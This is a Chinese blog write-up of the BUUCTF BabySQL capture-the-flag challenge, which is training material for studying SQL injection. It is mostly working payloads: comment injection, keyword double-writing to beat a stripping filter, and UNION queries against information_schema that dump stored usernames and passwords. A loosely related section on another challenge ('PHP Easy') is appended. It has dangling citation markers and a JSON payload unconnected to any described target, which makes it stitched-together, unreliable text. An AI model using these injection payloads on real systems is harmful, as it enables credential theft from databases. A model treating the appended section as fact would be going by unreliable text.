BUUCTF [极客大挑战 2019] BabySQL

BUUCTF [极客大挑战 2019] BabySQL

启动靶机,打开环境:
在这里插入图片描述
尝试登陆:
在这里插入图片描述
因为前两次的题目BUUCTF 极客大挑战 2019 EasySQL 极客大挑战 2019 LoveSQL均用万能密码登陆成功,再次尝试:

/check.php
?username=admin' or '1'='1
&password=1

在这里插入图片描述
登陆失败,尝试注释掉password内容:

/check.php
?username=admin' %23
&password=1

在这里插入图片描述
登陆成功,尝试查询字段数:

/check.php
?username=admin' order by 3%23
&password=1

在这里插入图片描述
根据报错信息,可以判断出屏蔽掉了关键字:or,所以万能密码登陆失败,尝试双写绕过:

/check.php
?username=admin' oorr '1'='1%23
&password=1

在这里插入图片描述
因为存在将关键字置换为空的过滤,全部双写以绕过,查询字段数:

/check.php
?username=admin' uniunionon selselectect 1,2,3,4 %23
&password=1

在这里插入图片描述
判断出字段数为3,查询回显点位:

/check.php
?username=1' uniunionon selselectect 11,22,33 %23
&password=1

在这里插入图片描述
得到回显点位为23,查询当前数据库名及版本:

/check.php
?username=1' uniunionon selselectect 11,version(),database() %23
&password=1

在这里插入图片描述
得到数据库名为:geek,继续查询当数据库中表名:

/check.php
?username=1' uniunionon selselectect 11,22,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database() %23
&password=1

在这里插入图片描述
得到两个表名为:b4bsqlgeekuser,查询第一个表中的内容:

/check.php
?username=1' uniunionon selselectect 11,22,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql' %23
&password=1

在这里插入图片描述
得到该表中的字段信息,查询usernamepassword的内容:

/check.php
?username=1' uniunionon selselectect 11,22,group_concat(concat_ws(0x7e,username,passwoorrd)) frfromom geek.b4bsql %23
&password=1
// 将1和2通过~(十六进制形式)连接
// 类似:username~password
group_concat(concat_ws(0x7e,1,2))

在这里插入图片描述
在这里插入图片描述

得到flag,完成题目

### BUUCTF 2019 PHP Easy 题目分析 #### 背景介绍 BUUCTF 是国内知名的 CTF 平台之一,其题目涵盖了多种安全领域。其中 PHP 类型的题目通常涉及反序列化漏洞、输入验证不足等问题。以下是针对 **BUUCTF 2019 PHP Easy** 的可能解题思路。 --- #### 反序列化漏洞基础 在 PHP 中,`serialize()` 和 `unserialize()` 函数分别用于对象的序列化和反序列化操作。如果开发者未对用户可控的数据进行严格校验,则可能导致反序列化漏洞的发生[^1]。 通过构造恶意的对象并将其传递给程序中的 `unserialize()` 方法,攻击者可以触发预期之外的行为,例如执行任意代码或访问敏感数据。 --- #### php://filter 协议的应用 PHP 提供了一些伪协议来处理特定场景下的文件流操作。例如: - `php://input`: 获取原始 POST 数据。 - `php://filter`: 对数据流应用过滤器,常用于绕过某些防护机制或读取文件内容。 当目标环境允许使用这些伪协议时,可以通过它们实现一些有趣的操作,比如以 Base64 编码形式读取远程脚本的内容[^2]。 --- #### 字符串查找函数 mb_strpos() 该函数返回指定子字符串首次出现的位置索引。需要注意的是,默认情况下它区分小写;另外还可以自定义字符集编码参数 `$encoding` 来适配多字节字符的需求[^3]。 此知识点虽然看似简单,但在实际利用过程中可能会被用来检测是否存在非法字符或者定位注入点等位置信息。 --- #### Payload 构造实例 假设题目存在 JSON 输入解析环节,并且服务器端会对提交过来的数据结构做进一步逻辑判断。那么我们可以尝试如下 payload: ```json { "Information": { "year": "2022abc", "items": [ 0, ["a"], "c" ] } } ``` 上述例子展示了如何精心设计嵌套数组以及特殊字段组合而成的有效载荷[^4]。当然具体形态还需依据实际情况调整优化。 --- #### 综合思考与建议 基于以上理论知识和技术手段,解决此类问题的关键在于深入理解官方给出的功能模块及其潜在缺陷所在之处。同时也要善于运用各种工具辅助完成调试工作。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值